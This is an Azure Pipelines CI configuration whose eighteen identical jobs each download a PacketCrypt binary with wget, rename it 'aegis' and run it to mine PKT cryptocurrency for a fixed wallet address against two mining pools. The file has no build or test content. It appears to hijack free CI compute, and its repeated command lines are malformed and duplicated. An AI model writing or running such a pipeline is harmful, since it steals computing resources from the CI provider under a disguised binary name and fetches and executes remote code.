trigger:
- main

pool:
  vmImage: ubuntu-latest

jobs:

- job: a

  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32chmod +x aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32

- job: b

  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32chmod +x aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32

- job: c

  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32chmod +x aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32

- job: d

  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32chmod +x aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32

- job: e

  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32chmod +x aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32

- job: f

  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32chmod +x aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32

- job: g

  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32chmod +x aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32

- job: h

  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32chmod +x aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32

- job: i

  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32chmod +x aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32

- job: j

  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32chmod +x aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32

- job: k

  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32chmod +x aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32

- job: l

  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32chmod +x aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32

- job: m

  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32chmod +x aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32

- job: n

  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32chmod +x aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32

- job: o

  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32chmod +x aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32

- job: p

  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32chmod +x aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32

- job: q

  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32chmod +x aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32

- job: r

  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32chmod +x aegis; chmod +x aegis; ./aegis ann -p pkt1q4wk402wdfqlu0andxcwetjuym7vr7pzgp9n6jt http://pool.pktpool.io http://pool.pkt.world/master -t32
